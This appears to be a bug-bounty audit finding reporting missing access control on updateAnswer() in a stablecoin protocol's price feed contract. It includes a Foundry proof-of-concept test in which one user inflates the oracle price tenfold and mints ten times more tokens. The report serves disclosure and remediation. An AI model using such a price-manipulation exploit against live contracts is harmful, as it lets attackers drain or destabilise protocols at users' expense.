15,000 USDC
View results
Submission Details
Severity: high

Lack of Access control in priceFeed Contract updateAnswer()

Summary

Price and HealthFactor can be manipulated by calling function updateAnswer(int256 _answer) public

Vulnerability Details

Calling the above named public function in the pricefeed can resets the price resulting in miscalculation of Token price and
hence Healthfactor.
The Healthfactor which is used in maintaining the system invariants can cause multiple problems when manipulated.

Impact

Contract can be fed with a false price before transacting thereby affecting protocol invariant.

POC

function test_manipulate_price_and_Mint_10Xmore_tokens() public {
vm.startPrank(user1);
uint MintAmt = 1000;
dsce.depositCollateralAndMintDsc(weth,1,MintAmt);
changePrank(user2); // changes to user2
int tenxPrice = ethPrice.latestAnswer() * 10;
ethPrice.updateAnswer(int(tenxPrice)); // manipulates price
dsce.depositCollateralAndMintDsc(weth,1,MintAmt * 10); // deposits & mints 10x more
console.log("b1",dsc.balanceOf(user1));
console.log("b2",dsc.balanceOf(user2));
assertEq(dsc.balanceOf(user1) * 10, dsc.balanceOf(user2));
}

Tools Used

Foundry

Recommendations

Append some access control to updateAnswer() in priceFeed Contracts

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.